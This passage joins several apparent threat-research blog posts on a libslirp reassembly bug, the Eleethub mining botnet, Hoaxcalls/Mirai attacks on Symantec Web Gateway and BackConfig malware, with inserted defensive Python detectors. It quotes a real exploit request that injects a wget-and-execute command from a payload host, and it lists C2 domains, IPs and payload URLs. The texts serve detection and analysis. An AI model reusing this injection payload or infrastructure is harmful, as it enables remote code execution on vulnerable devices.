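    """Raised for a fragment that cannot belong to a valid datagram."""


class BoundedReassembler:
    """Reassembles one datagram from fragments, rejecting oversize input."""

    def __init__(self):
        self._pieces = {}          # offset in bytes -> payload bytes
        self._total_len = None     # known once the last fragment arrives

    def add_fragment(self, frag_offset_units, more_fragments, payload):
        # IPv4 fragment offsets are expressed in 8-byte units (13-bit field).
        if not 0 <= frag_offset_units < (1 << 13):
            raise FragmentError("fragment offset out of range")
        start = frag_offset_units * 8
        end = start + len(payload)
        # The bound a reassembler must enforce: a fragment ending past the
        # maximum datagram size can never be valid, and trusting it is how
        # heap buffers get overrun or freed early.
        if end > IP_MAX_LEN:
            raise FragmentError(
                "fragment ends at %d, beyond the %d-byte limit" % (end, IP_MAX_LEN))
        if not more_fragments:
            if self._total_len is not None and self._total_len != end:
                raise FragmentError("conflicting last fragment")
            self._total_len = end
        elif len(payload) % 8 != 0:
            raise FragmentError("non-final fragment must be a multiple of 8 bytes")
        self._pieces[start] = payload
        return self.assembled()

    def assembled(self):
        """Return the datagram payload once every byte is present, else None."""
        if self._total_len is None:
            return None
        buf = bytearray()
        pos = 0
        for start in sorted(self._pieces):
            if start != pos:
                return None          # gap or overlap still unresolved
            buf += self._pieces[start]
            pos = start + len(self._pieces[start])
        return bytes(buf) if pos == self._total_len else None


def reassemble(fragments):
    """Feed (offset_units, more_fragments, payload) tuples; return payload or None."""
    r = BoundedReassembler()
    result = None
    for off, mf, data in fragments:
        result = r.add_fragment(off, mf, data)
    return result


def is_oversize_rejected(fragments):
    """True if the reassembler refuses the given fragment set."""
    try:
        reassemble(fragments)
    except FragmentError:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample: two fragments of a 24-byte payload.
    good = [(0, True, b"A" * 16), (2, False, b"B" * 8)]
    print(reassemble(good))
    # Constructed sample: a final fragment claiming to end beyond 65,535 bytes.
    bad = [(8191, False, b"C" * 16)]
    print(is_oversize_rejected(bad))
```

The rejected case is the interesting one: an offset of 8191 units is legal on its own (it fits the 13-bit field), and a 16-byte payload is legal on its own, but together they end at byte 65,544. Only a check on the sum catches it.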

Other vulnerabilities in libslirp could lead to code execution in the container rather than just a crash, and potentially to a breakout from the container to the host and to other containers. In 2020, two such vulnerabilities were found: CVE-2020-8608 and CVE-2020-7039.

I would like to thank the Slirp development team for acknowledging my security advisory and quickly issuing a fix patch. The affected Slirp versions are 4.0.0 to 4.2.0.

Prisma Cloud Protection

Palo Alto Networks customers running Prisma Cloud are protected through the Prisma Cloud Compute host and container vulnerability scanner, which alerts on software components affected by this vulnerability.

Figure 2. Prisma Cloud Compute host flag

Conclusion

Rootless containers present a new approach for containers that adds a major security layer. It could easily become the next trend in containers in the cloud. While there are still many limitations and some parts of their functionality are still experimental and are under development, I do think that with time and effort rootless containers could be fully functional and adopted by the community while taking the place of traditional containers.

Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self-Hiding

Executive Summary

Unit 42 researchers uncovered a new botnet campaign using Perl Shellbot, intended to mine Bitcoin, while avoiding detection using a specially crafted rootkit. 

The bot is propagated by sending a malicious shell script to a compromised device that then downloads other scripts. After the victim device executes the downloaded scripts, it starts waiting for commands from its Command and Control (C2) server. While the Perl programming language is popular in malware for its wide compatibility, this botnet can potentially affect not only Unix-based systems but also Windows 10 systems that use a Linux subsystem. 

This new campaign uses a shared library called libprocesshider.so to hide the mining processes on the infected device and a specially crafted rootkit to avoid detection. The malicious actors use the name “Los Zetas”, which is an allusion to a Mexican criminal organization regarded as one of the most dangerous drug cartels in the country. Despite that, it is unlikely that the attackers are actually part of this criminal organization. Additionally, this botnet has links to UnderNet, one of the largest IRC (Internet Relay Chat) networks where different topics are discussed including malware and cybercrime.

Moreover, the botnet was still under development when it was uncovered. As a result, it doesn’t have many recruiters. However, it was important to stop it before the attackers compromised more devices. We observed that the botnet performs Bitcoin mining on its victim devices on a growing scale, using known mining tools such as xmrig and emech. These tools have been seen in recent coin mining campaigns, such as VictoryGate and a Monero mining campaign that made over $6000 in profit. We estimate the Eleethub botnet could also grow to make thousands of dollars if it expands over a period of one to two years.

Shell Script Dropper

A compromised device will download a malicious shell script containing commands to download pieces of the botnet and create directories to copy the downloaded files into. Next, the device executes the downloaded files (procps.h, ps, setup, m) to start communicating with an IRC server. Additionally, it downloads and implements a library called libprocesshider.so (Figure 1), which will be explained later.

Figure 1. Downloaded files

Hiding Processes with a Rootkit

This botnet takes the concealment of mining tasks to the next level. First, it reuses the well known open-source process-hiding library libprocesshider to hide the mining process with LD_PRELOAD (Figure 2). This technique has been used in several past coin mining campaigns, such as that perpetrated by the Rocke group Unit 42 found in 2019. 

Figure 2. x.sh

In addition, the attackers use a specially crafted rootkit to hide the mining operation from the ps (process status) command. Specifically, the malware replaces the original ps tool with a crafted one. The crafted tool calls the real ps (Figure 3) but filters out the mining processes xmrig and emech, as well as sensitive keywords in the ps results such as proc, netstats, and tops (Figure 4). These keywords are usually assumed to be indicators of existing coin miners. By removing them, the miner hides itself from antivirus monitoring and avoids being killed by competing coin miners (Outlaw, for example), which usually scan the running processes to discover whether any other miners are present.

Figure 3. Installing rootkit
Figure 4. Process hiding
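Both hiding techniques described above are cross-view problems: libprocesshider filters /proc directory listings inside any dynamically linked process that has it preloaded, and the replaced ps drops lines by keyword, but neither alters what the kernel actually holds. The following is an added example, not code from the botnet or from Unit 42, that compares independent views of the process table and checks the preload paths; the PID lists and ld.so.preload contents are constructed samples, and the function names are my own.

```python
"""Cross-view detection of hidden processes (added example).

This is not the botnet's code. The rootkit described above hides miners two
ways: libprocesshider, forced into every dynamically linked process via
LD_PRELOAD or /etc/ld.so.preload, filters them out of /proc directory
listings, and a replaced ps binary drops lines matching certain keywords.
Comparing independent views of the process table exposes both. The inputs
to the pure functions below are constructed samples.
"""
import os
import re
import subprocess

# Keywords the crafted ps wrapper removes from its output, per the writeup.
FILTERED_KEYWORDS = ("xmrig", "emech", "proc", "netstats", "tops")


def find_hidden_pids(proc_pids, ps_pids):
    """PIDs present in /proc but missing from ps output."""
    return sorted(set(proc_pids) - set(ps_pids))


def preload_findings(ld_so_preload_text, environ):
    """Every library forced into processes via /etc/ld.so.preload or LD_PRELOAD."""
    libs = [ln.strip() for ln in ld_so_preload_text.splitlines() if ln.strip()]
    libs += [p for p in re.split(r"[:\s]+", environ.get("LD_PRELOAD", "")) if p]
    return libs


def suspicious_preloads(libs):
    """Preloaded libraries named after the known process-hiding library."""
    return [lib for lib in libs if "processhider" in os.path.basename(lib).lower()]


def ps_output_missing_names(ps_lines, names=FILTERED_KEYWORDS):
    """Names known to be running (e.g. from /proc/<pid>/comm) that ps does not show."""
    joined = "\n".join(ps_lines)
    return [name for name in names if name not in joined]


# Live collectors for a Linux host. If /etc/ld.so.preload is in effect this
# interpreter is hooked too, so run preload_findings() first, or take the
# /proc listing from a statically linked tool.
def read_proc_pids(proc_root="/proc"):
    """The kernel's own view of running PIDs."""
    return [int(n) for n in os.listdir(proc_root) if n.isdigit()]


def read_ps_pids():
    """PIDs according to whatever ps is first on PATH (possibly the replaced one)."""
    out = subprocess.run(["ps", "-e", "-o", "pid="], capture_output=True,
                         text=True, check=True).stdout
    return [int(tok) for tok in out.split()]


if __name__ == "__main__":
    # Constructed sample: /proc shows seven PIDs, ps shows five.
    print(find_hidden_pids([1, 2, 345, 678, 910, 1112, 1314], [1, 2, 345, 678, 910]))
    libs = preload_findings("/usr/local/lib/libprocesshider.so\n", {"LD_PRELOAD": ""})
    print(suspicious_preloads(libs))
    print(ps_output_missing_names(["    1 init", "  345 sshd"], ["sshd", "xmrig"]))
```

On a real host the two live collectors replace the constructed lists; any PID the kernel reports that ps omits deserves a look at /proc/<pid>/exe and /proc/<pid>/cmdline.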

Connecting to the Botnet

Once the infected device has downloaded all the files in the rootkit (Figure 5) and has started running the malicious scripts, it will connect to an IRC server by sending an assigned nickname that starts with dark followed by a random integer number between 0 and 8999 (Figure 6).

Figure 5. Installation of the rootkit
Figure 6. Assigning a nickname to the compromised device (zombie)

The initial PING is followed by the word LAG + the current epoch time (Figure 8).

Figure 7. Sending the first PING to the IRC server

Additionally, it contains scripts to communicate with the UnderNet IRC server as well (Figure 8).

Figure 8. Sending a PING command to the IRC Undernet server
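The handshake described above (a NICK of dark followed by a number from 0 to 8999, then a PING carrying LAG and the epoch time) is a usable network fingerprint. The following is an added example, not the botnet’s code, that parses raw IRC lines and flags those two behaviours; the exact wire placement of the LAG token is an assumption, and the sample stream is constructed.

```python
"""Fingerprint the bot's IRC handshake in captured traffic (added example).

This is not the botnet's code. It parses IRC lines and flags the two
behaviours described above: a NICK of the form dark<N> with N in 0..8999,
and a PING carrying LAG followed by a Unix epoch timestamp. Where the LAG
token sits in the PING message is an assumption; the sample lines are constructed.
"""
import re

NICK_RE = re.compile(r"^dark(\d{1,4})$")
LAG_RE = re.compile(r"^LAG(\d{9,10})$")   # assumed format: LAG<epoch seconds>


def parse_irc_line(line):
    """Split an IRC message into (prefix, command, params); trailing param kept whole."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if not parts:
        return prefix, None, []
    params = parts[1:]
    if trailing is not None:
        params.append(trailing)
    return prefix, parts[0].upper(), params


def classify(line):
    """Return a finding string for a suspicious line, else None."""
    _, cmd, params = parse_irc_line(line)
    if cmd == "NICK" and params:
        m = NICK_RE.match(params[0])
        if m and int(m.group(1)) <= 8999:
            return "nick pattern dark<0-8999>: %s" % params[0]
    if cmd in ("PING", "PONG") and params:
        m = LAG_RE.match(params[-1])
        if m:
            return "%s with LAG<epoch> token: %s" % (cmd, params[-1])
    return None


def scan(lines):
    """(line number, finding) pairs for a captured client-to-server stream."""
    findings = []
    for n, line in enumerate(lines, 1):
        f = classify(line)
        if f:
            findings.append((n, f))
    return findings


if __name__ == "__main__":
    # Constructed sample stream (not real traffic).
    sample = [
        "NICK dark4821",
        "USER u 0 * :u",
        "PING :LAG1589212345",
        "NICK darkness",
        "PRIVMSG #chan :hello",
    ]
    for n, finding in scan(sample):
        print(n, finding)
```

Either finding on its own is weak (dark1234 is a plausible human nickname), so a rule built from this should require both within one session, in the order the post describes.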

Because the botnet was not yet ready by the time we discovered it, we were unable to receive any commands from the IRC server. However, we were able to connect manually to the IRC server and explore the channels available. We discovered that, fortunately, the Miners channel had just a few recruiters or zombies (Figures 10 and 11).

Figure 9. Channels found manually
Figure 10. Zombies in the botnet

Later, the compromised device could start receiving commands to send attacks such as UDP floods, TCP floods, port scans, and HTTP attacks (Figure 7).

Figure 11. Available attacks

Los Zetas from Eleethub

The domain associated with the C2 server is eleethub[.]com. We visited the website and found a message announcing that something was coming, which probably was the botnet they were preparing (Figure 12).

Figure 12. Visiting eleethub[.]com

In addition, the IRC server prints a banner (MOTD) with the name of that domain (Figure 13).

Figure 13. Message Of The Day - Eleet Hub

The phrase “Los Zetas” is mentioned multiple times in the malicious scripts that compose the botnet. The most notable ones are in the main rootkit directory, in the setup file (Figure 14), and in the information from the botnet operators undead[@]los[.]zetas[.]mx (Figure 15). “Los Zetas” is a reference to a Mexican criminal organization, regarded as one of the most dangerous drug cartels in the country. However, it is unlikely that the attackers are actually part of this criminal organization.

Figure 14. Reference to “Los Zetas” in setup file
Figure 15. User related to los[.]zetas[.]mx

Conclusion

The new Perl shell-based botnet uses libraries such as libprocesshider.so to hide mining activities. In addition, the attackers use a specially crafted rootkit to hide the mining operation from discovery.

The Perl programming language is popular in malware for its wide compatibility across many Unix-based systems, such as Linux servers, PCs, and even IoT devices. Perl is a scripting language and does not need to be compiled for every different CPU architecture or firmware version. Another advantage of using Perl scripts is the wide range of libraries that can easily be implemented. This type of botnet takes advantage of the computing power of compromised devices to do various tasks such as coin mining and launching DDoS attacks.

Palo Alto Networks customers are protected from the Perl shell botnet by the following platforms:

  1. Threat Prevention signature 85843, which identifies IRC C2 communication.
  2. PAN-DB and DNS Security, which block the attackers’ C2 server URL and domain.
  3. WildFire, which identifies and blocks Perl shell botnets.
  4. Palo Alto Networks IoT Security, which detects attacks such as IRC botnets targeting IoT devices.

Indicators of Compromise

Samples

7ed8fc4ad8014da327278b6afc26a2b4d4c8326a681be2d2b33fb2386eade3c6

dbef55cc0e62e690f9afedfdbcfebd04c31c1dcc456f89a44acd516e187e8ef6

d9001aa2d7456db3e77b676f5d265b4300aaef2d34c47399975a4f1a8f0412e4

14c351d76c4e1866bca30d65e0538d94df19b0b3927437bda653b7a73bd36358

6d1fe6ab3cd04ca5d1ab790339ee2b6577553bc042af3b7587ece0c195267c9b

C2 servers

eleethub[.]com

irc.eleethub[.]com

ghost.eleethub[.]com

62.210.119[.]142

82.76.255[.]62

Public keys found in the server

Mirai and Hoaxcalls Botnets Target Legacy Symantec Web Gateways

Executive Summary

As part of Unit 42’s efforts to proactively monitor threats circulating in the wild, I recently came across new Hoaxcalls and Mirai botnet campaigns targeting a post-authentication Remote Code Execution vulnerability in Symantec Secure Web Gateway 5.0.2.8, a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019. There is no evidence to suggest that any other firmware versions are vulnerable at this point in time, and these findings have been shared with Symantec. They confirmed the currently exploited vulnerability is no longer present in Symantec Web Gateway 5.2.8. Symantec also wanted to emphasize that this vulnerability does not impact Secure Web Gateway solutions, including ProxySG and Web Security Services.

The first instance of this vulnerability being exploited surfaced on April 24th, 2020 as part of an evolution of the Hoaxcalls botnet that was first discovered earlier that same month. This latest version of Hoaxcalls supports additional commands that allow an attacker greater control on the infected devices, such as the possibility to proxy traffic through them, downloading updates, maintaining persistence across device restarts, or preventing reboots, and a larger number of DDoS attacks that can be launched. The use of the exploit in the wild surfaced only a few days after the publication of the vulnerability details, highlighting the fact that the authors of this particular botnet have been pretty active in testing the effectiveness of new exploits as and when they are made public.

Following that, in the first week of May, I also came across a Mirai variant campaign involving the use of the same exploit, though in this campaign the samples themselves don’t contain any DDoS capabilities. Instead, they serve the purpose of propagation using credential brute force and exploitation of the Symantec Secure Web Gateway RCE vulnerability. This blog post provides the noteworthy technical details on these two campaigns.

Palo Alto Networks customers are protected from this attack: WildFire correctly identifies all related samples as malicious and Threat Prevention blocks all exploits used by this variant. In addition, AutoFocus customers can track this exploit using the tag SymantecWebGateway_RCE.

Hoaxcalls Evolution

The Hoaxcalls botnet, an offshoot of the Bashlite/Gafgyt malware family, was first discovered in April 2020, exploiting recently disclosed vulnerabilities in certain models of Grandstream business telephone IP PBX systems, and Draytek Vigor routers.

A few weeks later, the botnet was found exploiting an unpatched vulnerability impacting Zyxel Cloud CNM SecuManager.

On April 24th, I observed samples of the same botnet incorporating an exploit targeting the EOL’d Symantec Secure Web Gateway v5.0.2.8, with an HTTP request in the format:

POST /spywall/timeConfig.php HTTP/1.1
User-Agent: XTC

posttime=1585228657&saveForm=Save&timesync=1&ntpserver=http://qweqwe.com;$(wget%20http://plexle.us/Th5xrRAm%20-O%20/tmp/viktor%20&&%20chmod%20777%20/tmp/viktor%20&&%20/tmp/viktor);#&timezone=5

As seen in the snippet above, some samples reach out to a URL for a public file upload service (plexle[.]us) where the post-exploitation payload is hosted.
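The request above is command injection through the ntpserver parameter: a legitimate value is a hostname or address, so a command separator or $( ) substitution in that field is a reliable signal on its own. The following is an added example, not code from Symantec or from either botnet, that parses a captured POST to this endpoint, URL-decodes the parameter and flags shell metacharacters; the sample request is the one quoted above with the payload host replaced by a placeholder, and the second request is a constructed benign one.

```python
"""Detect command injection in timeConfig.php parameters (added example).

Not the botnet's code and not Symantec's. It parses a captured HTTP POST
like the one above, URL-decodes the ntpserver parameter and flags shell
metacharacters and command substitution, which a valid NTP server
address never contains. The sample request is the quoted one with the
payload host replaced by a placeholder; the benign request is constructed.
"""
import re
from urllib.parse import parse_qs

# Constructs that cannot appear in a hostname or IP but do in the exploit:
# command separators, substitution, redirection into a path.
INJECTION_RE = re.compile(r"[;&|`]|\$\(|\$\{|>\s*/")
HOSTNAME_RE = re.compile(r"^(?:https?://)?[A-Za-z0-9.\-]+(?::\d+)?/?$")


def split_http_request(raw):
    """Return (request_line, headers dict, body) from a raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for h in lines[1:]:
        k, _, v = h.partition(":")
        headers[k.strip().lower()] = v.strip()
    return lines[0], headers, body


def inspect_timeconfig(raw):
    """Findings for a request to /spywall/timeConfig.php; empty list if clean."""
    request_line, _, body = split_http_request(raw)
    findings = []
    if "/spywall/timeConfig.php" not in request_line:
        return findings
    params = parse_qs(body, keep_blank_values=True)
    for value in params.get("ntpserver", []):
        if INJECTION_RE.search(value):
            findings.append("ntpserver contains shell metacharacters: %r" % value)
        elif not HOSTNAME_RE.match(value):
            findings.append("ntpserver is not a plain host: %r" % value)
    return findings


# The request quoted above; payload host replaced with a placeholder.
SAMPLE_REQUEST = (
    "POST /spywall/timeConfig.php HTTP/1.1\r\n"
    "User-Agent: XTC\r\n"
    "\r\n"
    "posttime=1585228657&saveForm=Save&timesync=1&ntpserver=http://qweqwe.com;"
    "$(wget%20http://PAYLOAD_HOST/payload%20-O%20/tmp/viktor%20&&%20chmod%20777"
    "%20/tmp/viktor%20&&%20/tmp/viktor);#&timezone=5"
)

# Constructed benign request to the same endpoint.
BENIGN_REQUEST = (
    "POST /spywall/timeConfig.php HTTP/1.1\r\n\r\n"
    "posttime=1585228657&saveForm=Save&timesync=1&ntpserver=pool.ntp.org&timezone=5"
)

if __name__ == "__main__":
    print(inspect_timeconfig(SAMPLE_REQUEST))
    print(inspect_timeconfig(BENIGN_REQUEST))
```

Note that the `&&` inside the injected command also splits the form body, so parse_qs only sees the first part of the payload in ntpserver; the separator and substitution characters are still there, which is what the check keys on.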

A comprehensive list of indicators of compromise (IOCs), along with a timeline of this activity can be found at the end of this post.

While the new version of the Hoaxcalls botnet is very similar to the initial version, to the point that it even uses the same encryption scheme with the exact same keys, it supports additional commands that allow an attacker greater control on the infected devices such as the possibility to proxy traffic through them, downloading updates, maintaining persistence across device restarts or preventing reboots, and a larger number of DDoS attacks that can be launched. These have been detailed below.

Flooder Commands   Description
SYMANTEC           scan and infect Symantec Secure Web Gateway devices using the RCE described just above
FASTFLUX           proxy traffic from the device to an address specified by the attacker
UNINSTALL          kill the running malware process
KILLTELNET         kill the telnet service on the device (this is probably to make maintenance of an infected device trickier for administrators)
LOCKDEVICE         set up a cron job to ensure the binary is running and maintain persistence across device restarts
UPDATE             delete the existing bot binary, and download an update from 164[.]132.92.180/sh using either wget or tftp (the update URL was serving a script, as seen in Fig 1 below)
MOVE               switch IRC server
IOCTL              disable the watchdog timer to prevent reboots
HTTPCONN           launch HTTP CONNECTION request flood against specified target
HTTPOPTIONS        launch HTTP OPTIONS request flood against specified target
HTTPTRACE          launch HTTP TRACE request flood against specified target
HTTPDELETE         launch HTTP DELETE request flood against specified target
HTTPPUT            launch HTTP PUT request flood against specified target
HTTPPOST           launch HTTP POST request flood against specified target
HTTPHEAD           launch HTTP HEAD request flood against specified target
HTTPGET            launch HTTP GET request flood against specified target
URG                launch URG flood against specified target
PSH                launch PSH flood against specified target
ACK                launch ACK flood against specified target
FIN                launch FIN flood against specified target
RST                launch RST flood against specified target
SYN                launch SYN flood against specified target
TCP                launch TCP flood against specified target
VSE                launch VSE flood against specified target

Table 1. New Flooder commands

The URL contacted for the update serves a shell script that downloads and executes binaries from attacker-controlled URLs.

Fig 1. Hoaxcalls update URL

Other bot and flooder commands in common with the previous version of the Hoaxcalls botnet have been described in detail previously.

Mirai Variant

Samples of this campaign surfaced early May, built on the Mirai source code, and are packed with a modified version of UPX by using a different 4-byte key with the UPX algorithm.

Another deviation from the Mirai source code is the use of ten 8-byte keys that are applied cumulatively in a byte-wise string encryption scheme.

     0xDEADBEEF, 0x85DAB8BF, 0xDEEDEEBF, 0xDEABBEAF, 0xDBBD45BF, 0x246584EF, 0x85BFE8BF, 0xD68395BF, 0xDBAAAAAF, 0x0DAABEEF

This is similar to the scheme used by the Hoaxcalls botnet and has been seen in previous variants too. However, as with previous implementations, the use of multiple keys does not imply greater encryption complexity; in this case it essentially amounts to a byte-wise XOR with 0x5a.
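Why ten keys collapse to one byte: Mirai’s table obfuscation XORs every byte of a string with each byte of the key in turn, and XOR is associative and commutative, so applying ten keys is the same as applying one byte equal to the XOR of all forty key bytes. The following added example (my own code, not the malware’s) folds the ten values listed above and checks that the result is 0x5a; the values are taken as the 32-bit words shown, and zero-padding them to 8 bytes would not change the XOR. The plaintext string is constructed.

```python
"""Fold the ten Mirai-variant string keys into the single effective XOR byte.

Added example, not the malware's code. Mirai's table obfuscation XORs every
byte of a string with each byte of its key in turn; with ten keys applied
cumulatively that is forty single-byte XORs, which fold into one constant.
The key list is the one given above; the sample plaintext is constructed.
"""
from functools import reduce
from operator import xor

KEYS = [0xDEADBEEF, 0x85DAB8BF, 0xDEEDEEBF, 0xDEABBEAF, 0xDBBD45BF,
        0x246584EF, 0x85BFE8BF, 0xD68395BF, 0xDBAAAAAF, 0x0DAABEEF]


def key_bytes(key):
    """The four bytes of one 32-bit key (byte order is irrelevant for XOR)."""
    return key.to_bytes(4, "big")


def effective_key(keys=KEYS):
    """XOR of all bytes of all keys: the only value the data is really XORed with."""
    return reduce(xor, (b for k in keys for b in key_bytes(k)), 0)


def xor_with_keys(data, keys=KEYS):
    """Apply the scheme literally: every key byte of every key, byte-wise."""
    out = bytearray(data)
    for k in keys:
        for kb in key_bytes(k):
            out = bytearray(b ^ kb for b in out)
    return bytes(out)


def decode(data, keys=KEYS):
    """Equivalent fast path: a single-byte XOR with the folded key."""
    ek = effective_key(keys)
    return bytes(b ^ ek for b in data)


if __name__ == "__main__":
    print("effective key: 0x%02x" % effective_key())
    sample = b"/bin/busybox"            # constructed plaintext
    enc = xor_with_keys(sample)
    print(enc.hex(), decode(enc))
```

The same function applied to the original Mirai table key 0xDEADBEEF alone gives 0x22, the single-byte key long known from the leaked source, which is a quick sanity check that the folding is right.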

In this campaign, the samples themselves don’t contain any DDoS capabilities, but rather serve the purpose of propagation using credential brute force and exploitation of the Symantec Secure Web Gateway RCE vulnerability.

Speculation on Exploitation Success

It is worth mentioning that the botnets’ success at exploitation and infection is limited by the following two facts:

  1. The Symantec Secure Web Gateway RCE vulnerability being exploited is a post-authentication vulnerability implying the exploit is only effective for authenticated sessions.
  2. The devices being targeted are EOL’d products from 2012, and installations with newer firmware would not be vulnerable.

Conclusion

In the case of both campaigns, one can assume that their success with this exploit is limited by the post-authentication nature of the Symantec Secure Web Gateway RCE vulnerability.

Palo Alto Networks customers are protected by:

  • WildFire, which detects all related samples with malicious verdicts
  • Threat Prevention, which blocks all exploits used by this variant.

The exploit can be tracked in AutoFocus using the tag SymantecWebGateway_RCE.

Palo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit www.cyberthreatalliance.org.

Indicators of Compromise

First Seen SHA256 URL
2020-05-07 1cec4576595048a179bf8c21b58f33ef61ae1825b2b3f0a86915a741a04f253f 45[.]95.168.250/swrgiuhguhwrguiwetu/arm
2020-05-07 a31187ed8545789ff2979037e19e1ca18d35a75820a1ec91053782f30c47ecc5 45[.]95.168.250/swrgiuhguhwrguiwetu/arm5
2020-05-07 ef5d39a3fa641b4d55d870437a9ba774eefcfa2c69066dd0a6fbe513a4b7a8f2 45[.]95.168.250/swrgiuhguhwrguiwetu/arm6
2020-05-07 04e8356bdc8782cf03acc9f69ff6fa9dfde7378dcd1fe0dc737d13fd4d7e061e 45[.]95.168.250/swrgiuhguhwrguiwetu/arm7
2020-05-07 60f755288c9d3110d2fe5d872b2c045156dcea4be9a5cc918bddf1e786881842 45[.]95.168.250/swrgiuhguhwrguiwetu/m68k
2020-05-07 0e531e105aa3419cd19e95fa9d44f6176157002a09444a1e5465657d743180ac 45[.]95.168.250/swrgiuhguhwrguiwetu/mips
2020-05-07 02dc186a39607475838bb4859f89e7a200f74fed41400ab5db4eb42d3f58f772 45[.]95.168.250/swrgiuhguhwrguiwetu/mpsl
2020-05-07 72675ccf2d4e0d0aac2f5121a6a80ea1efc4f30b22e64b07bd891438de2bf82a 45[.]95.168.250/swrgiuhguhwrguiwetu/ppc
2020-05-07 0a48cc158a07e13bd76ac941c4523692530f836d69256b02a10052248263d781 45[.]95.168.250/swrgiuhguhwrguiwetu/sh4
2020-05-07 37dfde696632295e806924de3d3ab751404e2a968e063a12ce72eb2e3ce0b984 45[.]95.168.250/swrgiuhguhwrguiwetu/x86
2020-05-02 da84fd43cb8701c4e23dd0a4175ebccebda026ca2f47b7b1bad393205075389f 164[.]132.92.180/arm4
2020-05-02 287645a5a29a39ef94aa0cdebdbd3cb4ad2a45ead8894fc323a5a2a76a7fdb0d 164[.]132.92.180/arm5
2020-05-02 4a4316178e85e0d4c94d74af9f2258c045194cf7a4f4a83a90abf5db09fbaa04 164[.]132.92.180/i586
2020-05-02 38290965b2cd8048b3ef076487b99dfbeef457f6f6f9998b95ff922e160a5113 164[.]132.92.180/i486
2020-05-02 25d1c51135dca20f4f7a720f237d9186edde2a2a664ede6bef37e843e7be409c 164[.]132.92.180/i686
2020-05-02 012d49c6e847f2f75983b46a9a1310dac29b5f8d30b665ae2124d8619b80753b 164[.]132.92.180/m68k
2020-05-02 763dfa5f391d27e65be6682c2e58c888df309fa2732781db312f5c9b10e6d5a1 164[.]132.92.180/mips
2020-05-02 ad1156e6ad91b02f225d82d96000cf9abf671a305e8c5c61229d69dbed5050ba 164[.]132.92.180/mips64
2020-05-02 28f31eb4b1fd3b7e742f5043a26b383585317d16bbfdae0296e18b90dcbec29b 164[.]132.92.180/ppc440
2020-05-02 5d8756118b7e017eb4f4c5da4236191b20a5c8cb96abb76c26f0e918a76bd973 164[.]132.92.180/mpsl
2020-05-02 1f64287ae9ea968017b3615f2b5b51932d7eeb3f0ee6621f74ae29af8f1a27d5 164[.]132.92.180/sh4
2020-05-02 65a8ea32f77c2d18325d49d0cc32a4bbf893a2f106e77e8a8670191c71b456a9 164[.]132.92.180/spc
2020-05-02 2b0854d40d8ffdca886f4540156b7addc4245de5df197e39ce198b9cf098944a 164[.]132.92.180/arm6
2020-05-02 43ce5e4fb95b57fa2921d718e989107a594d5287b5bbbcb3e9bff262a982e815 164[.]132.92.180/ppc
2020-05-02 3d6be7b9bd4798000230e354a5777601ca6672c8d84af842469ddeb1681ed7f2 164[.]132.92.180/arm7
2020-05-02 e0141934100df75d6b0c61858fc4cc44f97ce2a2588aa5d042f965f9542b843b 164[.]132.92.180/x86
2020-05-01 85f397e052950f736b32f0463dce7a1458ed034bec57284ea83d2ee4788f8a82 164[.]132.92.180/x86
2020-05-01 b39763036951bb373e1389362c4de6c4cbd3af3757dbb66d53fceb69de02677f 164[.]132.92.180/arm7
2020-05-01 6d76fd0bb5ba2d1c19f64288bb4b20eb136171aa8ea1afb685d2e363911aab2f 164[.]132.92.180/arm6
2020-05-01 5415ce3e759bcc3a8a163a84b64a7185f6540d4ec0ff07627ac770fd0ef0244d 164[.]132.92.180/arm5
2020-05-01 b52f8ff49e172a3e41ec60010c4089e3534ad1f0582a7ee04c4aa58c34db21ca 164[.]132.92.180/arm4
2020-05-01 e248445c39cac693fc2a921e41879fb80286f418c352d7a9d428d6181fe113a3 164[.]132.92.180/mpsl
2020-05-01 a3e2d3536d3facd3d825949addd7e99152b5df395b26e41e04b16be0a8cf4d85 164[.]132.92.180/mips
2020-04-27 82e5e0f6c130a3f0424cf33468f5ec7a3a66d14f5d346196d1b604ecd2b1e6a3 164[.]132.92.180/x86
2020-04-27 fa1bc69c9eccaaa4b8131856f9e69837f10dfa1236a65e0a8954d297c2a465bd 164[.]132.92.180/arm4
2020-04-26 233d4f6ee9f0ffb52b88de0218a0a4b04e3b20c5440e6414255d644ef696d190
2020-04-24 81e9a4b8f8a7d06d871488d9c869bde54a83ff7fe33d652ed58c10109b9830ee plexle[.]us/Th5xrRAm
2020-04-24 e15eeeaeb0ac0639bf3491ba8801e30516e085047f2d787397966065bdf9d5e7
2020-04-24 5916171938fba2d218de38c8b1f484345bc62d436b7b501ef986ae06c133b13d
2020-04-24 970496ac754ce7573216950a9904bdfc75574b4c0605e1d62364be799b9c813b
2020-04-24 735beaa92e7d697a521c7ed5292b3e8100c29a2af88f1a1b99abf0a1bc5ab5c8 164[.]132.92.180/i686
2020-04-24 84e017a59f9f7d7d5fde40bc2867a1e9d6ec6fae63b3e21685b3bb7166357531 164[.]132.92.180/arm7
2020-04-24 81e9a4b8f8a7d06d871488d9c869bde54a83ff7fe33d652ed58c10109b9830ee
2020-04-24 9ce642628cec8de80d2186d5d7f020635180326ed9e33cabde46d6c9b2caba1b
2020-04-24 20c3f1bbf4ae4733c6e01eb4f82a251bcb5b0ae0bd5f1b1a028b7ff65ea779af
2020-04-24 ddab987e986f76fcc36af92a6ea15439dd36253d91c0c3cddd77b2b9fd9ff395
2020-04-24 7bca6fcc70d14253803780e80ee57b29814adeae1af993374f919a1017f5b0f5

Updated BackConfig Malware Targeting Government and Military Organizations in South Asia

Executive Summary

Unit 42 has observed activity over the last 4 months involving the BackConfig malware used by the Hangover threat group (aka Neon, Viceroy Tiger, MONSOON). Targets of the spear-phishing attacks, using local and topical lures, included government and military organizations in South Asia.

The BackConfig custom trojan has a flexible plug-in architecture for components offering various features, including the ability to gather system and keylog information and to upload and execute additional payloads.

